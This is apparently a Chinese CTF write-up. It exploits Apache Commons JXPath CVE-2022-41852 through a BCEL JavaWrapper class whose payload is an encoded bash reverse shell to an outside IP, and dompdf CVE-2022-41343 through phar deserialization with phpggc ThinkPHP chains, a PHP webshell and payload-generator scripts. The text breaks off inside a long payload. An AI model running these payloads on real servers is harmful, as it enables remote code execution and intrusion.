ezjxpath

cve-2022-41852

这里看别的师傅的博客写的是TCTF中的非预期解

刚开始的时候,发现这是个CVE漏洞,但是google能搜到的方法他全给ban了,所以这个得自己去找利用链子来打

image-20230424202815660

这里的话是给了一个不知道啥玩意的东西,然后把jar包下载下来进行查看

image-20230424203035639

就是这里产生了漏洞利用点

网上能查到的payload

1
2
3
4
5
6
7
8
9
public static void main(String[] args) {
try {
JXPathContext context = JXPathContext.newContext(null);
context.getValue("exec(java.lang.Runtime.getRuntime(), 'calc')");
} catch (Exception e) {
e.printStackTrace();
}
}

1
2
3
4
5
6
7
8
public static void main(String[] args) {
try {
JXPathContext context = JXPathContext.newContext(null);
context.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:9000/spring-Evil.xml\")");
} catch (Exception e) {
e.printStackTrace();
}
}
1
2
3
4
5
6
try {
JXPathContext context = JXPathContext.newContext(null);
context.getValue("javax.naming.InitialContext.doLookup('rmi://127.0.0.1:1099/1u560y')");
} catch (Exception e) {
e.printStackTrace();
}

就是这常见的三种,但是都给ban掉了

image-20230424203330834

于是我们就得自己去寻找链子来打了

如此一来我们只能另寻蹊跷了,赛后就突然想到TCTF里的非预期解好多都是静态方法,而这里我们也是用静态方法去利用的
com.sun.org.apache.bcel.internal.util.JavaWrapper,这个类的_main方法逻辑如下

这个类在rt.jar包里,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
  public static void _main(String[] argv) throws Exception {
/* Expects class name as first argument, other arguments are by-passed.
*/
if(argv.length == 0) {
System.out.println("Missing class name.");
return;
}

String class_name = argv[0];
String[] new_argv = new String[argv.length - 1];
System.arraycopy(argv, 1, new_argv, 0, new_argv.length);

JavaWrapper wrapper = new JavaWrapper();
wrapper.runMain(class_name, new_argv);
}
}

主要逻辑在于runMain方法里面,class_name和new_argv就是类名和参数,逻辑如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
public void runMain(String class_name, String[] argv) throws ClassNotFoundException
{
Class cl = loader.loadClass(class_name);
Method method = null;

try {
method = cl.getMethod("_main", new Class[] { argv.getClass() });

/* Method _main is sane ?
*/
int m = method.getModifiers();
Class r = method.getReturnType();

if(!(Modifier.isPublic(m) && Modifier.isStatic(m)) ||
Modifier.isAbstract(m) || (r != Void.TYPE))
throw new NoSuchMethodException();
} catch(NoSuchMethodException no) {
System.out.println("In class " + class_name +
": public static void _main(String[] argv) is not defined");
return;
}

try {
method.invoke(null, new Object[] { argv });
} catch(Exception ex) {
ex.printStackTrace();
}
}

loader.loadClass(class_name);处显然是有类加载的,而这个loader仔细一看会发现是一个BCEL

image-20230425195757268

根据这道题在重新捡一下动态类加载 进行复习一下

这里的话考察的是 Java安全之BCEL ClassLoader

既然有这个东西,那么我们就写篇文章来学一下这个BCEL ClassLoader

然后对于上述的JavaWrapper类,最后loadclass后会去调用恶意类的_main方法,那我们只需要复刻一下恶意类就好了

下面的就是恶意类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
package org.example;

import java.io.IOException;

public class calc {
public static void _main(String[] argv) throws IOException {
Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTE2LjExOS4yNTMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
}

public static void main(String[] args) {

}
}

image-20230425224414705

随之把他编译为字节码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
package org.example;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

import java.io.IOException;

/**
* Hello world!
*
*/
public class App
{
public static void main( String[] args ) throws Exception {
JavaClass javaClass = Repository.lookupClass(calc.class);
String code = Utility.encode(javaClass.getBytes(), true);
System.out.println("$$BCEL$$"+code);
Class.forName("$$BCEL$$"+code,true,new ClassLoader());


}

最后打入

1
2
context.getValue("com.sun.org.apache.bcel.internal.util.JavaWrapper._main(split('$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmR$5dO$TA$U$3dC$b7$5d$ba$ae$C$c5$ef$_$aab$y$d2$ba$R$88$n$a91i$9ab4$db$WiS$82$3e$98$e92$d9N$d3$dd$r$bb$db$ba$80$fc$u_$d4$f8$e0$P$f0G$Z$ef$b4$84$Sa$92$993s$ee$99s$e7$de$cc$9f$bf$bf$7e$Dx$89$a7$G2$b8m$e0$O$ee$ce$e2$9e$c2$fb$3a$k$e8x$c8$90y$z$7d$Z$bfaH$VV$3a$MZ5$d8$X$Ms$b6$f4Ec$e8uE$d8$e6$dd$B19$3bp$f8$a0$c3C$a9$ce$a7$a4$W$f7d4$8e$85$ae$r$S$ee$j$M$84E2$a7$cc$90$fe$ecq$e93$dc$y$7c$b2$fb$7c$c4$ad$B$f7$5d$ab$V$87$d2w$cb$e3T$3ctG$M$8b$97$84$Z$8cZ$e2$88$83X$G$7e$a4c$89$c4$T3u$87$S$g$ad$60$Y$3abK$aaGdU$c2$X$ca$c3$84$8eY$jy$T$8f$f0$98$81wy$d4$cb$97$9c$fc$b1pzAq$cf$db$3a$e2$d5J$cc$5b$95$d5$f7$b22$fa$f8$b6$b3f$af$ef$f4$9d$eafRo$7f$Y$d6$db$b55$bb_K$9a$ad$8d$c3F$bb$3ej$i9$eb$8d$c3$ca$97m$b9$97$9c$7c$3d$s3$f1j$a3X$da$9f$ec$7b$c5$92$3c1$f1$E$cb$M$f3$ff$97O$d4$b4$a6f$b7$_$9c$98$K$jS2$b0$de5$cf$8acX$98$Kw$86$7e$y$3d$aa$c8pE$7cv$b8QX$b1$_h$a8C$9aH$E$rzV$b8$a4$bb$e7$a8$ed0pD$U$95$a9$ri$fa$Ej$a4$c0T$a3h$cd$d2$c9$od$84$e9$e7$3f$c0$be$d1f$G$G$ad$99$J$89$x$b4$9a$a7$7b$TW$J$b3$b8$869R$a9$cb$9b$84$wf$fc$c4L$$$f5$j$da$ee$d4$c1$m$E$r$caR$aa$a9$8b$81y$y$Q$e6hj$c4$yR$fc$3a$f9M$k$b3JS$a9$$$3c$c4$3cgA$3d$Z$5b$d0$df$g$abn$fd$D$f9$9fP$X$e8$C$A$A',','))");

这里用到的split来获取数组,因为_main只接受数组参数

image-20230425224659954

image-20230426104354659

在这里loadclass返回恶意类之后,然后调用了恶意类里的_main方法,然后就到题目的

context.getvalue()方法,这个方法会调用到invoke方法,然后进行命令执行。

pdf_converter_revenge

题目

image-20230426105232681

查看给的源码发现这里存在一个路劲,然后发现了这个thinkphp版本,这里的非预期解是可以直接拿thinkphp v5.0.21的poc直接打

接下来讲一下预期解

考点:Phar反序列化

image-20230426105634466

发现有一个依赖叫做dompdf

CVE-2022-41343 - 通过 Phar 反序列化的 RCE

这里的话根据版本号去google搜索漏洞的话,还是可以搜到一些漏洞分析文章的

DomPDF库反序列化RCE漏洞分析

这两篇文章都可以进行参考

漏洞点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
public function registerFont($style, $remoteFile, $context = null)
{
[...]
$entry[$styleString] = $localFile;

// Download the remote file
[$protocol] = Helpers::explode_url($remoteFile);
$allowed_protocols = $this->options->getAllowedProtocols();
if (!array_key_exists($protocol, $allowed_protocols)) {
Helpers::record_warnings(E_USER_WARNING, "Permission denied on $remoteFile. The communication protocol is not supported.", __FILE__, __LINE__);
}

foreach ($allowed_protocols[$protocol]["rules"] as $rule) {
[$result, $message] = $rule($remoteFile);
if ($result !== true) {
Helpers::record_warnings(E_USER_WARNING, "Error loading $remoteFile: $message", __FILE__, __LINE__);
}
}

list($remoteFileContent, $http_response_header) = @Helpers::getFileContent($remoteFile, $context);
if ($remoteFileContent === null) {
return false;
}
[...]
}

image-20230426111849366

主要错误就在这一段,在if ($result !== true)后并没有return来结束,因此可以进入getFileContent函数,这意味着可以使用任何协议,然后包括主角phar

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
   public static function getFileContent($uri, $context = null, $offset = 0, $maxlen = null)
{
$content = null;
$headers = null;
[$protocol] = Helpers::explode_url($uri);
$is_local_path = in_array(strtolower($protocol), ["", "file://", "phar://"], true);
$can_use_curl = in_array(strtolower($protocol), ["http://", "https://"], true);

set_error_handler([self::class, 'record_warnings']);

try {
if ($is_local_path || ini_get('allow_url_fopen') || !$can_use_curl) {
if ($is_local_path === false) {
$uri = Helpers::encodeURI($uri);
}
if (isset($maxlen)) {
$result = file_get_contents($uri, false, $context, $offset, $maxlen);
} else {
$result = file_get_contents($uri, false, $context, $offset);
}
if ($result !== false) {
$content = $result;
}
if (isset($http_response_header)) {
$headers = $http_response_header;
}

} elseif ($can_use_curl && function_exists('curl_exec')) {
[...]
}
} finally {
restore_error_handler();
}

return [$content, $headers];
}

[...]

image-20230426112016718

这里就是触发phar反序列化的关键了

可以看到file_get_contents,之后就不赘述了,接下来解释一下复现步骤,由于题目是基于TP5的,那么肯定是可以打TP5的反序列化利用链。
首先我们要生成恶意字体文件,用以下脚本去生成:

脚本是上面的分析文章里写的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python3
import fontforge
import os
import sys
import tempfile
from typing import Optional

def main():
sys.stdout.buffer.write(do_generate_font())

def do_generate_font() -> bytes:
fd, fn = tempfile.mkstemp(suffix=".ttf")
os.close(fd)
font = fontforge.font()
font.copyright = "DUMMY FONT"
font.generate(fn)
with open(fn, "rb") as f:
res = f.read()
os.unlink(fn)
result = res
return result

if __name__ == "__main__":
main()

大概率会报错font模块没找到apt-get install python3-fontforge安装一下
之后可以生成可以font:

image-20230426114443537

就是把python脚本生成的内容给到font.ttf里面

然后就开始使用phpggc来生成payload

PHPGGC是一款能够自动生成主流框架的序列化测试payload的工具,可以说是反序列化的武器库,平时遇到有关反序列化的题目时如果能够熟练运用它,将节省大量功夫

./phpggc -l 查看可利用的反序列化链

image-20230426195919698

这里根据题目的thinkphp版本来进行选

./phpggc ThinkPHP/FW1 <remote_path> <local_path>
用法如上,remote_path是要写入靶场的位置,local_path是你shell文件的位置。
需要注意的是。tp5的话写入public文件夹下。因为只有public文件夹下我们可以访问
这里我准备的shell如下。

1
<?php eval($_POST[1]);?>

image-20230426200140792

1
php -d phar.readonly=0 phpggc ThinkPHP/RCE2 system "echo '<?php system($_GET[0]); ?>' > /var/www/html/public/mochu7.php" -p phar -pp font.ttf -o font-polyglot.phar

image-20230426201055420

然后用下面的脚本生成payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/env python3
import argparse
import hashlib
import base64
import urllib.parse
import os

PAYLOAD_TEMPLATE_URL_ENCODED = '''
<style>@font-face+{+font-family:'exploit';+src:url('%s');+font-weight:'normal';+font-style:'normal';}</style>
'''
PAYLOAD_TEMPLATE = '''
<style>
@font-face {
font-family:'exploit';
src:url('%s');
font-weight:'normal';
font-style:'normal';
}
</style>
'''

def get_args():
parser = argparse.ArgumentParser( prog="generate_payload.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''
This script will generate payloads for CVE-2022-41343
''')
parser.add_argument("file", help="Polyglot File")
parser.add_argument("-p", "--path", default="/var/www/", help="Base path to vendor directory (Default = /var/www/)")
args = parser.parse_args()
return args

def main():
args = get_args()
file = args.file.strip()
path = args.path.strip()
if(os.path.exists(file)):
generate_payloads(file, path)
else:
print("ERROR: File doesn't exist.")

def generate_payloads(file, path):
with open(file, "rb") as f:
fc = f.read()
b64 = base64.b64encode(fc)
data_uri_pure = "data:text/plain;base64,%s" % b64.decode()
data_uri_double_encoded = "data:text/plain;base64,%s" % urllib.parse.quote_plus(urllib.parse.quote_plus(b64.decode()))
md5 = hashlib.md5(urllib.parse.unquote(data_uri_double_encoded).encode()).hexdigest()
# 计算md5这里,因为大佬这里是两次url编码,但是上传之后服务器接收会解一次url,dompdf真正处理的数据应该是经过一次url解码的数据,所以计算md5需要解一次url编码才是正确的文件名
phar_uri = "phar://%s/vendor/dompdf/dompdf/lib/fonts/exploit_normal_%s.ttf##" % (path,md5)
req1_enc = PAYLOAD_TEMPLATE_URL_ENCODED % data_uri_double_encoded
req2_enc = PAYLOAD_TEMPLATE_URL_ENCODED % urllib.parse.quote_plus(phar_uri)
req1_pure = PAYLOAD_TEMPLATE % data_uri_double_encoded
req2_pure = PAYLOAD_TEMPLATE % phar_uri
print("====== REQUEST 1 ENCODED =======")
print(req1_enc)
print("====== REQUEST 2 ENCODED =======")
print(req2_enc)
print("====== REQUEST 1 NOT ENCODED =======")
print(req1_pure)
print("====== REQUEST 2 NOT ENCODED =======")
print(req2_pure)

if __name__ == "__main__":
main()

1
python 1.py -p "/var/www/html" font-polyglot.phar

image-20230426201328406

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
====== REQUEST 1 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('data:text/plain;base64,UHJvZ3JhbSByb290OiAvdXNyCldhcm5pbmc6IEZvbnQgY29udGFpbmVkIG5vIGdseXBocwrvv73vv706Y3Z0ICF5Z2FzcO%252B%252Fve%252B%252FvWdseWY977%252B977%252B9PmFwCiAgICAgICAgICAgICAgICAgICAgICAgVGhlYWQhRe%252B%252Fve%252B%252Fve%252B%252FvTZoaGVhICRobXR477%252B9Ie%252B%252FvQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvY2EqbWF4cEc5OCBuYW1l77%252B9IylGYO%252B%252FvXBvc3Tvv73vv70yRCLvv712Tl8877%252B9CiAgICAgICAg77%252B977%252B9bkvvv73vv71uS%252B%252B%252FvSEq77%252B9Wu%252B%252Fve%252B%252FvUAu77%252B977%252B977%252B977%252B977%252B977%252B977%252B977%252B9MVBmRWTvv73vv73vv70g77%252B9OFrvv70gbCFNNOKWku%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvSF5KioqISrvv70u77%252B9Lzzvv73vv70y77%252B977%252B9PO%252B%252Fve%252B%252FvTLvv70vPO%252B%252Fve%252B%252FvTLvv73vv70877%252B977%252B9MjMhJzMjISAgICAgIO%252B%252Fve%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvWYhWO%252B%252FvQogICAgICAgIDVPJe%252B%252FvSAgICDvv70gICAgICAgKyAgICAgICAgICAgICAgICEgICAgICAgPyAgICAgICBKVyAgICAgIO%252B%252FvSAgICAgICDvv70gICBEVU1NWSBGT05URFVNTVkgRk9OVFVudGl0bGVkMVVudGl0bGVkMVJlZ3VsYXJSZWd1bGFyRm9udEZvcmdlIDIuMCA6IFVudGl0bGVkMSA6IDI2LTQtMjAyM0ZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyNi00LTIwMjNVbnRpdGxlZDFVbnRpdGxlZDFWZXJzaW9uIDAwMS4wMDBWZXJzaW9uIDAwMS4wMDBVbnRpdGxlZDFVbnRpdGxlZDHvv73vv70y77%252B977%252B977%252B977%252B977%252B9de%252B%252FvW5L77%252B977%252B9bkvvv70KPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%252BDQpVCgAAAQAAABEAAAABAAAAAAAfCgAATzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NTp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7YjowO3M6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjU0OiJlY2hvICc8P3BocCBzeXN0ZW0oKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvMS5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6Mjp7aTowO3M6Mjoibm8iO2k6MTtzOjM6IjEyMyI7fX1zOjk6IgAqAHBhcmVudCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo1NDoiZWNobyAnPD9waHAgc3lzdGVtKCk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljLzEucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NTQ6ImVjaG8gJzw%252FcGhwIHN5c3RlbSgpOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy8xLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fX0IAAAAdGVzdC50eHQEAAAAthRJZAQAAAAMfn%252FYpAEAAAAAAAB0ZXN022l2ia1yjzHI4j9%252F%252FNeso0pc1gcCAAAAR0JNQg%253D%253D');+font-weight:'normal';+font-style:'normal';}</style>

====== REQUEST 2 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fvendor%2Fdompdf%2Fdompdf%2Flib%2Ffonts%2Fexploit_normal_da94a27b825aeca64e86b19a3972972d.ttf%23%23');+font-weight:'normal';+font-style:'normal';}</style>

====== REQUEST 1 NOT ENCODED =======

<style>
@font-face {
font-family:'exploit';
src:url('data:text/plain;base64,UHJvZ3JhbSByb290OiAvdXNyCldhcm5pbmc6IEZvbnQgY29udGFpbmVkIG5vIGdseXBocwrvv73vv706Y3Z0ICF5Z2FzcO%252B%252Fve%252B%252FvWdseWY977%252B977%252B9PmFwCiAgICAgICAgICAgICAgICAgICAgICAgVGhlYWQhRe%252B%252Fve%252B%252Fve%252B%252FvTZoaGVhICRobXR477%252B9Ie%252B%252FvQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvY2EqbWF4cEc5OCBuYW1l77%252B9IylGYO%252B%252FvXBvc3Tvv73vv70yRCLvv712Tl8877%252B9CiAgICAgICAg77%252B977%252B9bkvvv73vv71uS%252B%252B%252FvSEq77%252B9Wu%252B%252Fve%252B%252FvUAu77%252B977%252B977%252B977%252B977%252B977%252B977%252B977%252B9MVBmRWTvv73vv73vv70g77%252B9OFrvv70gbCFNNOKWku%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvSF5KioqISrvv70u77%252B9Lzzvv73vv70y77%252B977%252B9PO%252B%252Fve%252B%252FvTLvv70vPO%252B%252Fve%252B%252FvTLvv73vv70877%252B977%252B9MjMhJzMjISAgICAgIO%252B%252Fve%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvWYhWO%252B%252FvQogICAgICAgIDVPJe%252B%252FvSAgICDvv70gICAgICAgKyAgICAgICAgICAgICAgICEgICAgICAgPyAgICAgICBKVyAgICAgIO%252B%252FvSAgICAgICDvv70gICBEVU1NWSBGT05URFVNTVkgRk9OVFVudGl0bGVkMVVudGl0bGVkMVJlZ3VsYXJSZWd1bGFyRm9udEZvcmdlIDIuMCA6IFVudGl0bGVkMSA6IDI2LTQtMjAyM0ZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyNi00LTIwMjNVbnRpdGxlZDFVbnRpdGxlZDFWZXJzaW9uIDAwMS4wMDBWZXJzaW9uIDAwMS4wMDBVbnRpdGxlZDFVbnRpdGxlZDHvv73vv70y77%252B977%252B977%252B977%252B977%252B9de%252B%252FvW5L77%252B977%252B9bkvvv70KPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%252BDQpVCgAAAQAAABEAAAABAAAAAAAfCgAATzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NTp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7YjowO3M6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjU0OiJlY2hvICc8P3BocCBzeXN0ZW0oKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvMS5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6Mjp7aTowO3M6Mjoibm8iO2k6MTtzOjM6IjEyMyI7fX1zOjk6IgAqAHBhcmVudCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo1NDoiZWNobyAnPD9waHAgc3lzdGVtKCk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljLzEucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiO